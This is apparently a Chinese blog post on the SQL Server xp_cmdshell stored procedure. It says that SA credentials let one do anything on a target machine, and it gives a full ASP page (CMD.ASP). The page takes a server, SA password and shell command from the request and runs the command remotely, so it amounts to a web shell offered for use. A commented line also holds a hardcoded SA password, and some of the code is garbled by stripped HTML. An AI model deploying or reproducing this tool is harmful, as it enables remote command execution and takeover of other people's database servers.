XP_CMDSHELL存储过程是执行本机的CMD命令，要求系统登陆有SA权限，也就是说如果获得SQLSERVER的SA命令，那就可以在目标机为所欲为了，知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。

下面是我写的一个简单的应用页面(ASP)，代码如下。

CMD.ASP

SQLSERVER_XP_CMDSHELL实例_魔术师·刘

<%if request("cmd")"" then%>

XP_CMDSHELL请求结果

<%

dim connstr,conn,rs,i

ConnStr="Provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"

'ConnStr="Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"

set conn=Server.CreateObject("ADODB.Connection")

conn.open Connstr

set rs=server.CreateObject("ADODB.Recordset")

set rs=conn.execute("xp_cmdshell '"&replace(replace(request("cmd"),"'","''"),chr(34),"''")&"'")

i=0

while not rs.eof

if not isnull(rs(0)) then

if i mod 2 =0 then

response.Write ""&rs(0)&""

else

response.Write ""&rs(0)&""

end if

i=i+1

end if

rs.movenext

wend

rs.close

set rs=nothing

conn.close

set conn=nothing

%>

XP_CMDSHELL实例

服务器

SA密码

CMD命令